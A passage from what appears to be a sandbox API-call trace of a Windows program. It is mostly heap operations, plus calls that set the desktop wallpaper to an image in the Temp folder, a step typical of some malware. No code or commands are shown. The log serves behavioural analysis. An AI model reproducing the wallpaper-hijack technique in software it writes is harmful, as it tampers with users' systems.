returned 0x4 [0292.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0292.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0292.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0292.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0292.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0292.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0292.160] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0292.160] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0292.160] RegCloseKey (hKey=0x2d0) returned 0x0 [0292.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0292.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0292.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0292.162] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0292.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0292.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0292.162] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0292.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0292.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0292.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0292.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0292.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0292.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0292.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0292.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0292.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0292.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0292.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0292.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0292.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0292.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0292.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0292.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0292.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0292.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0292.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0292.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0292.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0292.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0292.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0292.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0292.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0292.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0292.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0292.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0292.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0292.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0292.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0292.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0292.164] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0292.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0292.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0292.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0292.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0292.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0292.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0292.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0292.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0292.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0292.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0292.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0292.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0292.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0292.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0292.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0292.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0292.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0292.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0292.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0292.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0292.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0292.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0292.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0292.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0292.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0292.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0292.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0292.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0292.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0292.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0292.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0292.168] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0292.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0292.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0292.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0292.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0292.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0292.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0292.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0292.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0292.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0292.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0292.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0292.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0292.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0292.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0292.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0292.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0292.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0292.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0292.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0292.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0292.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0292.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0292.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0292.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0292.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0292.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0292.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0292.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0292.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0292.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0292.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0292.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0292.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0292.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0292.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0292.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0292.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0292.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0292.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0292.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0292.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0292.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0292.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0292.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0292.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0292.170] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0292.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0292.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0292.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0292.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e698c8 [0292.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e698c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0292.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0292.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0292.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0292.171] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0292.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0292.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0292.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0292.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0292.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0292.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0292.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0292.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0292.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0292.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0292.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0292.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0292.172] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0292.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0292.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0292.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0292.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0292.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0292.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0292.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0292.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0292.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0292.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0292.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0292.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0292.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0292.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0292.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0292.248] FreeLibrary (hLibModule=0x750c0000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, 